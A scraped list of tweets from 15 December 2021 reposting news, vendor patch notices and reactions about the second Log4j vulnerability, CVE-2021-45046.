2021-12-15 12:38:33@rob_winch @marcusdacoregio @sjohnr With the latest CVE-2021-45046, is spring boot vulnerable?… https://t.co/IT0kn2yHyJ https://twitter.com/i/web/status/1471083760267395074KGSybko
2021-12-15 12:30:40Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released #Cybersecurity #security https://t.co/X3xIhiOLrS https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlNecio_news
2021-12-15 12:30:22Second #Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/okoNocNaLE via… https://t.co/eKE1jYNyDU https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html https://twitter.com/i/web/status/1471094589717192713GDPR123
2021-12-15 12:23:01Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/1kr5dKXbFB http://dlvr.it/SFQ7vMsecurity_wang
2021-12-15 12:22:25@dietervds Hi, we can confirm that both YouTrack and Hub 2018.1+ are affected by CVE-2021-45046. We are now in the… https://t.co/clPaeRNLJu https://twitter.com/i/web/status/1471088010808676361youtrack
2021-12-15 12:22:20Second #Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released #cybersecurity https://t.co/i1mj2p6ggj https://lnkd.in/edBF-fsbmelihozhan
2021-12-15 12:22:18Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/7Ax2rUk6iL https://t.co/zSzblkIsC0 https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html_therealmark_
2021-12-15 12:21:21めも。、CVE-2021-450468022
2021-12-15 12:21:09Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released. The incomplete patch for CVE-2021-4422… https://t.co/aA3FC9oycV https://twitter.com/i/web/status/1471089732088221698pauleriksen
2021-12-15 12:20:51@LunaSecIO Thanks a lot for this POC, it helped me to understand the CVE-2021-45046 vulnerability and its exploitation context 👏righettod
2021-12-15 12:20:50Second log4j Vulnerability Published (CVE-2021-45046) #log4j #log4j2 #cybersecurity https://t.co/NWfqd5o9ez https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046sandeepyadav
2021-12-15 12:20:36Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) #apiversion #rce #log4j #thread… https://t.co/KtDTUCTc1A https://twitter.com/i/web/status/1471091587253952515Hacker__News
2021-12-15 12:20:30Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/YsArzSYgzy #Cybersecurity… https://t.co/hcDMkW97Wg https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html https://twitter.com/i/web/status/1471091666081796096_silvino_
2021-12-15 12:00:58Second Log4j Vulnerability (CVE-2021-45046) Discovered #news #technology #cybersecurity #infosec #hacker… https://t.co/Vnw3MPlEtG https://twitter.com/i/web/status/1471083808027860997LanceSchukies
2021-12-15 11:54:57I suspect Jamf Pro is still vulnerable. Version 2.15.0 was used in the 10.31.1 update. CVE-2021-45046 a workaround… https://t.co/4DFDDNdmsT https://twitter.com/i/web/status/1471080245000290307spotmac
2021-12-15 11:53:52Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/QikEJkCBqK https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/RonaldsVilcins
2021-12-15 11:46:30@TheHackersNews You just got 500 views for “Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Rele… https://t.co/aXQFjk7ryh https://twitter.com/i/web/status/1471077589510987783dailydotdevhi
2021-12-15 11:41:23See the latest cyber and data science articles! Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patc… https://t.co/ZyCB51CD26 https://twitter.com/i/web/status/1471077733342064646jn66data
2021-12-15 11:22:49Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/bvqodZJFIc https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html_Blackmac
2021-12-15 11:20:35Oh shit, here we go again... Second vulnerability in log4j... #CVE CVE-2021-45046 https://t.co/sz1N2QrUcM https://twitter.com/dnsmichi/status/1471071817813180416vojtechmares_
2021-12-15 11:17:28Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) #DFIR #YARA #ThreatIntel #malware… https://t.co/dFytZuiJuB https://twitter.com/i/web/status/1471058801021403139Ivityc
2021-12-15 11:16:12After #log4shell #CVE-2021-44228, One more flaw #CVE-2021-45046 is expecting a patch.WebOjos
2021-12-15 11:12:59@SumoLogic_Help @SumoLogic My question is: does CVE-2021-45046 impact Sumo Collector 19.361-12richardfan1126
2021-12-15 11:11:36mendelson converterIDE 2020 b290 released Fix for the Log4j security problem (CVE-2021-45046) More at: https://t.co/u9KBajhnKt https://mendelson-e-c.com/node/27360mendelson
2021-12-15 11:02:59Log4Shell Update: Second #log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/4sDoG6KTb9 https://buff.ly/3s8FAK6dnsmichi
2021-12-15 10:58:02Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) #DFIR #YARA #ThreatIntel #malware… https://t.co/dFytZuiJuB https://twitter.com/i/web/status/1471058801021403139Ivityc
2021-12-15 10:55:19#ITSecurity : Second #Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/VdRMJ6Sqdx via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlGAILLOTPatrice
2021-12-15 10:52:11Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/41JwHz3w91 vía @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlfjcastrosa
2021-12-15 10:32:00Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released. https://t.co/6doWJ4eW6E via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlhervmention
2021-12-15 10:31:27mendelson AS4 2021 b266 released Fix for the Log4j security problem (CVE-2021-45046) More at: https://t.co/BvjquiyBix https://mendelson-e-c.com/node/27359mendelson
2021-12-15 10:23:04Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released #cibersecurity #hacking #infosec… https://t.co/6oEuqwcGOb https://twitter.com/i/web/status/1471060758482063362web4x4_es
2021-12-15 10:13:02Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/lfrCzqbqJt https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/jedisct1
2021-12-15 10:12:41mendelson AS2 2021 b533 released Fix for the Log4j security problem (CVE-2021-45046) More at: https://t.co/cD2ri7umDo https://mendelson-e-c.com/node/27357mendelson
2021-12-15 10:12:03mendelson OFTP2 2021 b328 released Fix for the Log4j security problem (CVE-2021-45046) More at: https://t.co/bE8m7j8XDS https://mendelson-e-c.com/node/27358mendelson
2021-12-15 10:11:11@matiwinnetou CVE-2021-45046 talks about “certain non-default configurations”. So it can be good for you, but still… https://t.co/dqkbe6KG2O https://twitter.com/i/web/status/1471059072694763530TacticalGrace
2021-12-15 10:02:02Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/8aqvTzdxdm vía @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlciberconsejo
2021-12-15 10:01:56Since the CVE CVE-2021-45046, we're upgrading again log4j2 implementation of slf4j. Sorry for the downtime… https://t.co/T3pOZcl9UD https://twitter.com/i/web/status/1471055394680328197uproditnetwork
2021-12-15 10:01:04えまってCVE-2021-45046???キャッチおくれたmushroom080
2021-12-15 10:00:36Apache Log4j 2 Security Vulnerability CVE-2021-45046 - Kronos hit with ransomware, warns of data breach and 'severa… https://t.co/fbsiLVdTFI https://twitter.com/i/web/status/1471056839706038272steveburnley
2021-12-15 10:00:33CVE - CVE-2021-45046 https://t.co/tKgTHwhbui https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046mushroom080
2021-12-15 10:00:21@3811015 Äh, jetzt leider schon. CVE-2021-45046 🤮sjuerges
2021-12-15 09:53:39omg... wtf... really? 2nd #log4j? https://t.co/52bSvyOnRN #CVE-2021-45046 i hate my life... https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlsecuninja
2021-12-15 09:53:32I was reading there's not a catchy name for CVE-2021-45046? How about yulelog4shell ? 'Tis the season! #Log4Shellhalgorithm
2021-12-15 09:52:19Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec: https://t.co/uBnIcx3rQe https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/digeex_security
2021-12-15 09:52:00... mit dem Booster-Patch für CVE-2021-45046 dann auch mindestens 4 Wochen warten. #log4j https://t.co/tNDYzwLR4D https://twitter.com/DaRenegader/status/1470488281531961349mame82
2021-12-15 09:51:23Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/q9mG7xTp8K via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmltony_cleal
2021-12-15 09:51:19Log4Shell Update: Second #log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec… https://t.co/77XPHrk5mk https://twitter.com/i/web/status/1471050185774096386domineefh
2021-12-15 09:50:30Heads up: Log4Shell update: second log4j vulnerability published CVE-2021-45046: the fix to address CVE-2021-4422… https://t.co/qvv0VsdBzr https://twitter.com/i/web/status/1471053270458187779SimonByte
2021-12-15 09:50:29CVE-2021-45046 を考慮して KB の回避策が更新されるかもって書いてあるなぁ(遠い目 https://t.co/j1eOjnnJjR https://core.vmware.com/vmsa-2021-0028-questions-answers-faqJangari_nTK
2021-12-15 09:50:18Second #Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/DKb2nqms8J by… https://t.co/p30KwK4nZ4 https://bit.ly/3273udC https://twitter.com/i/web/status/1471053882155585536CelerityLimited
2021-12-15 09:50:11#عاجل أصدرت Apache ترقيع جديدً (CVE-2021-45046) للأداة المساعدة #log4j بعد أن تم اعتبار الترقيع السابق لاستغلال… https://t.co/k2aezwINwz https://twitter.com/i/web/status/1471054323102715907HackEast1
2021-12-15 09:33:17Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/dXGlGzn7Fy via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlsarmentots
2021-12-15 09:31:50URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for th… https://t.co/0gV6VjfHdJ https://twitter.com/i/web/status/1471046226070016000HackerMonks
2021-12-15 09:21:50#Log4j - CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/M10MuGJghF https://twitter.com/i/web/status/1471047226466185222CyberDonkyx0
2021-12-15 09:14:30@SumoLogic Does CVE-2021-45046 affect the latest sumo collector 19.361-12? I see no update after log4j 2.16.0 rele… https://t.co/GeNYgApa7B https://twitter.com/i/web/status/1471043535827013636richardfan1126
2021-12-15 09:11:47An updated workaround for CVE-2021-44228, as well as guidance on a second vulnerability, CVE-2021-45046 was release… https://t.co/3hgGZ2EgwH https://twitter.com/i/web/status/1471044214427246597ronkita0306
2021-12-15 09:04:57https://t.co/yAezF7JPC4 Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://ift.tt/3GHrZxereddit4devs
2021-12-15 09:04:28https://t.co/g7dAUn8UBN Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://ift.tt/3oUpIsmreddit4devs
2021-12-15 09:00:10Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/wJbPeoYSqL https://ift.tt/3IT5WFCDanielTechIT
2021-12-15 08:57:32@TheHackersNews your article “Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released” was view… https://t.co/UJ9erLoVBw https://twitter.com/i/web/status/1471034807245324294dailydotdevhi
2021-12-15 08:55:44Security News!! Apache Org. has issued a new patch (CVE-2021-45046) for #Log4j https://t.co/kidjB80GLb https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlStealth_Bay
2021-12-15 08:54:58Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/K5dcFsTl3M https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlSecnewsbytes
2021-12-15 08:43:53Gute Übersicht und Anleitung [1] zur Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) und ein praktisches… https://t.co/Xp2SUCKf7u https://twitter.com/i/web/status/1471036662557855748Wurzelmann
2021-12-15 08:40:40log4jshell、相変わらずわちゃわちゃしてるけど、そろそろ議論は収束に向かってるのかな?  今日新しい脆弱性が出たけど。CVE-2021-45046。riikunn_ryo
2021-12-15 08:37:13Security Analysis of the 2nd Log4j CVE published earlier (CVE-2021-45046 / Log4Shell2) https://t.co/H1LIeqbkV3… https://t.co/jrxb08dDdk https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ https://twitter.com/i/web/status/1471033963992911873beingsheerazali
2021-12-15 08:35:53Argh CVE-2021-45046MoartnW
2021-12-15 08:35:46Let's dive into the next round of #log4j patching! The fix from 2.15.0 yields new CVE-2021-45046 because it was inc… https://t.co/pHixeF5lfZ https://twitter.com/i/web/status/1471027533445541893jverhoelen
2021-12-15 08:35:31Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/dehVFqhuA6 https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/nubeblog
2021-12-15 08:31:31CVE - CVE-2021-45046 https://t.co/9XvaUI59EQ https://ift.tt/3F0iQ2knerubesa
2021-12-15 08:29:37Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/1dmro0aZdg https://t.co/a7ZXj3xZuP http://dlvr.it/SFPTlhtecnicahack
2021-12-15 08:25:56Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/5XnVyPDvoA https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/Securityblog
2021-12-15 08:24:55Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/CtyjP2U8lJ #log4j #CyberSecurity https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlYorickReintjens
2021-12-15 08:19:47Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/RC3ZWBhshN https://t.co/Yrdre2B3Xm http://dlvr.it/SFPVQ2ScinaryCyber
2021-12-15 08:11:53Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228 & CVE-2021-45046) | LunaSec https://t.co/Igy5GdG4Gs https://ift.tt/3s2FweGmagiauk
2021-12-15 08:10:30Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaSec https://t.co/3EFmohsdAo https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ohhara_shiojiri
2021-12-15 08:09:56CVE-2021-45046 https://t.co/0NDytYw9v8 https://twitter.com/Sweet5hark/status/1470714199466823684Sweet5hark
2021-12-15 08:06:49Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/Q19OrbX5uO https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlcybercavc
2021-12-15 08:05:50Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/ctLS6Db7ai https://t.co/edorLLs2c9 http://dlvr.it/SFPSkDDataChime
2021-12-15 08:04:13CVE-2021-45046 log4j2の脆弱性もう一発来てるけど、サービス運用妨害だからまだマシかj416dy
2021-12-15 08:03:32Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/aK34nJ3tqT https://t.co/nLMyhln944 https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?utm_source=dlvr.it&utm_medium=twitterSociability
2021-12-15 07:52:59The second vulnerability — tracked as CVE-2021-45046 — is rated 3.7 out of a maximum of 10 on the CVSS rating syste… https://t.co/oSs9ObgDwd https://twitter.com/i/web/status/1471024312228454401bvn7999
2021-12-15 07:52:08@law98765432 Sure: CVE-2021-26084 and more recently, CVE-2021-45046WilliamNB
2021-12-15 07:47:21Log4J’s CVE-2021-44228 now superseded by CVE-2021-45046 as the fixes / workarounds initially advertised for v2.10+… https://t.co/t7BdYVYreW https://twitter.com/i/web/status/1471019990589612032UKRichA
2021-12-15 07:43:42Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/RwAlkB2Sra http://dlvr.it/SFPQV0floppydisk2MB
2021-12-15 07:33:05CVE-2021-45046の言及がない記事は情報が古いので注意だなohhara_shiojiri
2021-12-15 07:31:42the second Log4j bug (CVE-2021-45046) is not very severe: - it only triggers if an app already has ${ctx:someVar} i… https://t.co/Eyt4LWk31E https://twitter.com/i/web/status/1471018496435929090zhuowei
2021-12-15 07:31:26🚨🚨 Another patch issued for #log4j last patch deemed incomplete (CVE-2021-45046) ..... #log4shell #log4jrce https://t.co/NBmEDIfItd https://lnkd.in/dEN8UAqAgearoidmaguire
2021-12-15 07:30:09Log4j için yeni sürüm geldi, hayırlı olsun. CVE-2021-45046 https://t.co/W7inLTrhgI Jndi lookupı kapatmanızda yet… https://t.co/V6IHqhJp7R https://nvd.nist.gov/vuln/detail/CVE-2021-45046 https://twitter.com/i/web/status/1471019646564327432hakanuzuner
2021-12-15 07:25:06Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/ZT7PPNS99Y https://t.co/b1Ryt0GxVl https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?utm_source=dlvr.it&utm_medium=twittergnanoia
2021-12-15 07:24:54@SeanWrightSec Great writeup! As with the official description: I prefer not calling CVE-2021-45046 a DOS on 2.15.… https://t.co/gihWs89R4w https://twitter.com/i/web/status/1471015711061557252seolsson
2021-12-15 07:21:42#Log4Shell Update: Second #log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/fRLXMrNww9… https://t.co/xaIBxP6GDX https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ https://twitter.com/i/web/status/14710168653883269130xrb
2021-12-15 07:20:09Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/WpHT8iv1pJ #log4j #cybersecurity https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/YorickReintjens
2021-12-15 07:15:52दूसरा Log4j भेद्यता (CVE-2021-45046) खोजा गया – नया पैच जारी किया गया https://t.co/I61WIaquZ2 https://www.hinditechupdates.tech/second-log4j-vulnerability-discovered-cve-2021-45046-new-patch-released/updates_hindi
2021-12-15 07:14:33"Second #Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released" https://t.co/SshM9hr5Mf via @TheHackersNews #CyberSecurity https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlfavremedia
2021-12-15 07:14:27Get your booster shot! New patch released for second Log4j vulnerability (CVE-2021-45046) https://t.co/L5hcDZECLc https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlpriscillaoppy
2021-12-15 07:11:41Previous log4j patch insufficient in some situations. New CVE posted and new log4j released 2.16. CVE-2021-45046 https://t.co/tRaxYeQeDv https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-450460x610B38
2021-12-15 07:03:48Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/1Cf5GYdjhz via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlmgembejr
2021-12-15 07:01:11メモ。Apache Log4j 2.15.0のCVE-2021-44228対応修正が不完全だったとして、CVE-2021-45046が登録され、Log4j 2.16.0がリリースされている。… https://t.co/VWgOqVLDAL https://twitter.com/i/web/status/1471011530426970118tsukamoto
2021-12-15 07:00:41Second #Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/K9ndC6DsXh https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlLaetitiaPayombo
2021-12-15 07:00:09"Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046)" https://t.co/HypCf3J49t https://ift.tt/30v4gkusokopulse
2021-12-15 06:53:52「任意のコード実行の脆弱性(CVE-2021-44228)への対策に加え、サービス運用妨害攻撃の脆弱性(CVE-2021-45046)などのリスクに対応するため、2.16.0または2.12.2へのアップデートを推奨します。」ohhara_shiojiri
2021-12-15 06:53:14Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/q83E7yDeTG via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlMichelGuillout
2021-12-15 06:43:11Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/IVDoSEsuHI noreply@blogger.com (Ravie Lakshmanan) https://bit.ly/3E9r33bDanWeb2_0
2021-12-15 06:42:29⚠️ Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released #DataBreaches #DarkWeb #CyberSec… https://t.co/K9R0pKNH9n https://twitter.com/i/web/status/1471005199334612992JinibaBD
2021-12-15 06:42:07#Apache Foundation has issued a new patch (CVE-2021-45046) for #Log4j utility after the previous patch for the rece… https://t.co/eCBIWShuOb https://twitter.com/i/web/status/1471005725782679557AntiVirusLV
2021-12-15 06:40:30Log4j 2.16.0 で修正された脆弱性には CVE-2021-45046 のIDが振られている https://t.co/lY8Ol7a24Q https://logging.apache.org/log4j/2.x/security.htmlspiegel_2007
2021-12-15 06:32:46On CVE-2021-45046 https://t.co/56G5RjZGTM https://twitter.com/d0nutptr/status/1471000703434854401d0nutptr
2021-12-15 06:31:29Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/DAbtzZQyBr https://t.co/IwFwOZtVqG https://bit.ly/3DUqWIrVigil8_DatSec
2021-12-15 06:31:03#Infosec UPDATE: @TheASF has issued a new patch (CVE-2021-45046) for #Log4j utility. The previous patch for the… https://t.co/MbQITv6ewW https://twitter.com/i/web/status/1471003894360780803YUSUPHKILEO
2021-12-15 06:22:32Disponible el parche para la segunda vulnerabilidad CVE-2021-45046 descubierta para Log4j que permite DoS a través… https://t.co/d4m0RLu8on https://twitter.com/i/web/status/1470999912254955523cyberseguridad
2021-12-15 06:22:29New: Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/tMRqtxwHnU https://ift.tt/3IT5WFCfreshSUNews
2021-12-15 06:20:32Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released - https://t.co/3olWJ4GxdR https://t.co/WR3v5Hi8Fr https://www.invisibleciso.com/12349213/second-log4j-vulnerability-cve-2021-45046-discovered-new-patch-released?via=twCisoInvisible
2021-12-15 06:12:23Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/wKTdVlidko via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlFordAntiTrust
2021-12-15 06:12:13Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/QrmjKIJwxW https://t.co/jBXL2tAJKQ https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?utm_source=dlvr.it&utm_medium=twitterHackerSpyNet1
2021-12-15 06:11:38Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/6vhQwjvJdj https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlLudovicoLoreti
2021-12-15 06:11:37Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/AS43hYZePT https://ift.tt/3IT5WFCFriedTauffer
2021-12-15 06:11:09Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released via noreply@blogger.com (Ravie Lakshman… https://t.co/HUl7fl18kU https://twitter.com/i/web/status/1470998913343709184coffeesec
2021-12-15 06:10:53Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/ppM23zthAa via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlsapytalwar
2021-12-15 06:10:48Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/5HMatxKs7G https://ift.tt/3IT5WFCgpol13
2021-12-15 06:10:39Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/WxPgp1SOMX via @TheHackersNews https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlwasinw_dev
2021-12-15 06:10:23あら。 #Log4shell https://t.co/xyzSBlJcdu CVE-2021-45046 対応 log4j 2.16.0 なるものが... 2.15.0で不十分だった問題を修正したと...😂 https://logging.apache.org/log4j/2.x/nakatafu
2021-12-15 06:01:20#log4j 2.15.0 Privilege Escalation Poc CVE-2021-45046 https://t.co/RatUs30O3q https://t.co/MAZvdxjfTi https://github.com/cckuailong/Log4j_CVE-2021-45046cckuailong
2021-12-15 06:01:05Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/wj5cjGHjUH https://t.co/2hcbzC4EHv http://dlvr.it/SFPBdXstevedriz
2021-12-15 06:00:57Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/9ilMbGYxfx #security… https://t.co/fg4je7B0l2 https://ift.tt/3IT5WFC https://twitter.com/i/web/status/1470995762041528324FilipiPires
2021-12-15 06:00:38Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/7HAQzHe53F https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?m=1AndradesFran
2021-12-15 06:00:34Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/pqtzW6NV4w #hackersnews https://ift.tt/3IT5WFCsalvietta150x40
2021-12-15 06:00:26Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/zNaQfRdge5 https://t.co/3FuBlezcqa https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html?utm_source=dlvr.it&utm_medium=twittergzunigah
2021-12-15 06:00:24CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of s… https://t.co/FnNibPRxic https://twitter.com/i/web/status/1470996486117007360autumn_good_35
2021-12-15 06:00:21Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/mMMiKPbVCejposwal
2021-12-15 06:00:16#CVE-2021-45046mbrheas
2021-12-15 05:58:12Pushed the days first #log4 #log4shell meta thread update: - Details of CVE-2021-45046 for 2.15.0 - need to upgrad… https://t.co/4zF4a3EL0R https://twitter.com/i/web/status/1470983358297563140ollieatnccgroup
2021-12-15 05:52:16Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch R #security #cybersecurity #hack #it-security https://t.co/lWzdJxf1BN https://thecybersecurity.news/general-cyber-security-news/second-log4j-vulnerability-cve-2021-45046-discovered-new-patch-released-15318/TheCySecNews
2021-12-15 05:51:54JNDI無効の2.16の件、CVE-2021-44228が不十分で2番目のCVE-2021-45046があるので対処が必要ohhara_shiojiri
2021-12-15 05:51:41Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/FcunpnWnx0 #news… https://t.co/jGmVX0Lsk5 http://dlvr.it/SFP9fr https://twitter.com/i/web/status/1470992406308741122DeepFriedCyber
2021-12-15 05:51:37Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/9QyWpOkPJD https://anith.com/second-log4j-vulnerability-cve-2021-45046-discovered-new-patch-released/anith
2021-12-15 05:51:34And another update to log4j 2.16.0 this time. Due to CVE-2021-45046 https://t.co/3IkHGya1ui https://github.com/katjahahn/PortEx/releases/tag/v3.0.3struppigel
2021-12-15 05:51:26Apache Issued a new patch(CVE-2021-45046) as it was found in previous patch that the fix to address CVE-2021-44228… https://t.co/BueDCJTgFW https://twitter.com/i/web/status/1470992781065687042DefcoreSec
2021-12-15 05:51:13Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/PCtCktULeV #TheHackerNews #MSExpertTalk #Security https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlRiazjavedbutt
2021-12-15 05:50:52#Log4Shell Update: Second #log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/IW5GVnhEAk https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/omiossec_med
2021-12-15 05:50:50Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/tkDaO9vcwh https://t.co/kfBpa8jMoE https://bit.ly/3GIfBwWtcdi
2021-12-15 05:50:42Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/XnFHmonTvN https://t.co/0akFhijKdR http://dlvr.it/SFPB5scloudplaninc
2021-12-15 05:44:53The Hacker News | Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/pFtn0HOnu5 https://bit.ly/3dTEnOkStopMalvertisin
2021-12-15 05:44:49"The Hacker News": Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released ... mas info aqui… https://t.co/YcBm6gl08s https://twitter.com/i/web/status/1470989562428248069FINSIN_CL
2021-12-15 05:44:35“CVE - CVE-2021-45046” https://t.co/WYfPljrtYF https://htn.to/3kWoGshqsGikosing
2021-12-15 05:44:23Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/u6QDr0FKc0 http://dlvr.it/SFP8hsJimBourke
